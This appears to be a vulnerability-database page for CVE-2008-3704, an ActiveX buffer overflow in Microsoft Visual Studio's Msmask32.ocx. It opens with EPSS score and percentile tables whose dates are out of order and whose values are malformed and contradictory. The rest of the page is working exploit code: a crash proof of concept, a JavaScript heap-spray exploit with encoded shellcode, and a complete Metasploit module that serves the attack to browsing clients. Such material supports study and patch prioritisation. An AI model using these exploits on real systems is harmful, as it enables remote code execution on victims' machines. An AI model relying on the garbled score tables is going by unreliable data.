CVE-2008-3704 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	87.31%	–	–
2023-03-12	–	–	–	97.11%	–
2023-04-02	–	–	–	97.06%	–
2023-05-14	–	–	–	96.89%	–
2023-06-18	–	–	–	96.52%	–
2023-07-30	–	–	–	96.53%	–
2023-09-03	–	–	–	96.34%	–
2023-10-08	–	–	–	96.54%	–
2023-11-12	–	–	–	95.91%	–
2023-12-17	–	–	–	95.82%	–
2024-01-28	–	–	–	96.4%	–
2024-02-11	–	–	–	96.4%	–
2024-03-03	–	–	–	96.37%	–
2024-04-07	–	–	–	96.6%	–
2024-06-02	–	–	–	96.03%	–
2024-06-16	–	–	–	96.34%	–
2024-07-21	–	–	–	96.53%	–
2024-08-25	–	–	–	96.38%	–
2024-12-22	–	–	–	96.1%	–
2025-03-02	–	–	–	95.91%	–
2025-01-19	–	–	–	96.1%	–
2025-03-09	–	–	–	95.91%	–
2025-03-18	–	–	–	–	80.63%
2025-03-30	–	–	–	–	81.78%
2025-03-30	–	–	–	–	81.78,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	1%
2023-04-02	1%
2023-05-14	1%
2023-06-18	99%
2023-07-30	99%
2023-09-03	99%
2023-10-08	99%
2023-11-12	99%
2023-12-17	99%
2024-01-28	99%
2024-02-11	1%
2024-03-03	1%
2024-04-07	1%
2024-06-02	99%
2024-06-16	1%
2024-07-21	1%
2024-08-25	1%
2024-12-22	1%
2025-03-02	1%
2025-01-19	1%
2025-03-09	1%
2025-03-18	99%
2025-03-30	99%
2025-03-30	99%

var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="'; var body1='"></OBJECT>'; var buf=''; for (i=1;i<=1945;i++){buf=buf+unescape("%0C");} document.write(body+buf+body1); # milw0rm.com [2008-08-14]

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote Buffer Overflow Exploit Author: Koshi Original POC: http://www.milw0rm.com/exploits/6244 ( Not by me ) My first ActiveX exploit, learned quite a bit playing with this one. Heaps are handy. ################################################# Loaded File: C:\WINDOWS\system32\MSMASK32.OCX Name: MSMask Version: 1.1 Class MaskEdBox GUID: {C932BA85-4374-101B-A56C-00AA003668DC} Number of Interfaces: 1 Default Interface: IMSMask RegKey Safe for Script: False RegKey Safe for Init: True KillBitSet: False ################################################# gr33tz: Rima my baby, str0ke, mess, and to all of those who have helped me over the years! <input language=JavaScript onclick=doIt() type=button value="Test Exploit"> <script language="JavaScript"> function doIt() { var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="'; var body1='"></OBJECT>'; var buf1 = ''; for (i=1;i<=1945;i++){buf1=buf1+unescape("%0c");} // win32_exec - EXITFUNC=process CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com var shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" + "%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b" + "%u5541%u4132%u3242%u4242%u4142%u4230%u5841%u3850%u4241%u7875" + "%u7969%u6d6c%u3038%u6544%u7550%u7350%u6e30%u516b%u7755%u4c4c" + "%u414b%u656c%u3355%u4348%u3831%u4c6f%u304b%u464f%u4c78%u314b" + "%u374f%u3450%u4a41%u624b%u4e69%u666b%u6e54%u666b%u6a61%u304e" + "%u3931%u4f50%u4c69%u6f6c%u5974%u3450%u3534%u5957%u7951%u565a" + "%u776d%u6f71%u7832%u6b6b%u6744%u714b%u6744%u7754%u3474%u4b35" + "%u6e55%u436b%u466f%u6544%u3851%u506b%u4c66%u564b%u306c%u4c4b" + "%u414b%u374f%u656c%u5a51%u6c4b%u654b%u4c4c%u674b%u6871%u6e6b" + "%u7169%u654c%u6674%u5964%u4653%u4951%u6550%u6c34%u634b%u3470" + "%u4b70%u4b35%u5470%u3438%u6e4c%u436b%u6670%u4e6c%u626b%u7550" + "%u4c4c%u6e6d%u536b%u3758%u4a78%u554b%u4c59%u6d4b%u6e50%u6550" + "%u6550%u4750%u6c70%u434b%u6558%u716c%u464f%u5a51%u4156%u3070" + "%u4d56%u6c59%u4e38%u4963%u7150%u526b%u7570%u7138%u4b6e%u4b68" + "%u3152%u6563%u4c38%u5958%u6e6e%u746a%u714e%u4b47%u7a4f%u7047" + "%u6363%u5251%u634c%u5553%u4550"); // A read through "Heap Feng Shui in JavaScript" shed some // much needed light on this topic for me. Thank you Alexander Sotirov. var shellcodeSize = (shellcode.length * 2); var spraySled = unescape("%u9090%u9090"); var heapAddress = 0x0c0c0c0c; var heapBlockSize = 0x100000; var spraySledSize = heapBlockSize - (shellcodeSize + 1); var heapBlocks = (heapAddress+heapBlockSize)/heapBlockSize; var x = new Array(); while (spraySled.length*2<spraySledSize) { spraySled += spraySled; } spraySled = spraySled.substring(0,spraySledSize/2); for (i=0;i<heapBlocks;i++) { x[i] = spraySled + shellcode; } document.write(body+buf1+body1); } </script> # milw0rm.com [2008-08-26]

## # $Id: ms08_070_visual_studio_msmask.rb 11127 2010-11-24 19:35:38Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Microsoft's Visual Studio 6.0. When passing a specially crafted string to the Mask parameter of the Msmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'koshi', 'MC' ], 'Version' => '$Revision: 11127 $', 'References' => [ [ 'CVE', '2008-3704' ], [ 'OSVDB', '47475' ], [ 'BID', '30674' ], [ 'MSB', 'MS08-070' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP0-SP2 IE 6.0 SP0-SP2', { 'Ret' => '' } ] ], 'DisclosureDate' => 'Aug 13 2008', 'DefaultTarget' => 0)) register_options( [ OptString.new('URIPATH', [ true, "The URI to use.", "/" ]) ], self.class) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) # Re-generate the payload. return if ((p = regenerate_payload(cli)) == nil) # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Create some nops. nops = Rex::Text.to_unescape(make_nops(4)) # Randomize the javascript variable names. vname = rand_text_alpha(rand(100) + 1) var_i = rand_text_alpha(rand(30) + 2) rand1 = rand_text_alpha(rand(100) + 1) rand2 = rand_text_alpha(rand(100) + 1) rand3 = rand_text_alpha(rand(100) + 1) rand4 = rand_text_alpha(rand(100) + 1) rand5 = rand_text_alpha(rand(100) + 1) rand6 = rand_text_alpha(rand(100) + 1) rand7 = rand_text_alpha(rand(100) + 1) rand8 = rand_text_alpha(rand(100) + 1) rand9 = rand_text_alpha(rand(100) + 1) rand10 = rand_text_alpha(rand(100) + 1) rand11 = rand_text_alpha(rand(100) + 1) content = %Q| <html> <script language="javascript"> var #{rand1}='<object classid="clsid:C932BA85-4374-101B-A56C-00AA003668DC"><param name="Mask" value="'; var #{rand2}='"></object>'; var #{rand3} = ''; for (#{var_i}=1;#{var_i}<=2145;#{var_i}++){#{rand3}=#{rand3}+unescape("%0c");} var #{rand4} = unescape("#{shellcode}"); var #{rand5} = (#{rand4}.length * 2); var #{rand6} = unescape("#{nops}"); var #{rand7} = 0x0c0c0c0c; var #{rand8} = 0x100000; var #{rand9} = #{rand8} - (#{rand5} + 1); var #{rand10} = (#{rand7}+#{rand8})/#{rand8}; var #{rand11} = new Array(); while (#{rand6}.length*2<#{rand9}) { #{rand6} += #{rand6}; } #{rand6} = #{rand6}.substring(0,#{rand9}/2); for (#{var_i}=0;#{var_i}<#{rand10};#{var_i}++) { #{rand11}[#{var_i}] = #{rand6} + #{rand4}; } document.write(#{rand1}+#{rand3}+#{rand2}); </script> </html> | print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end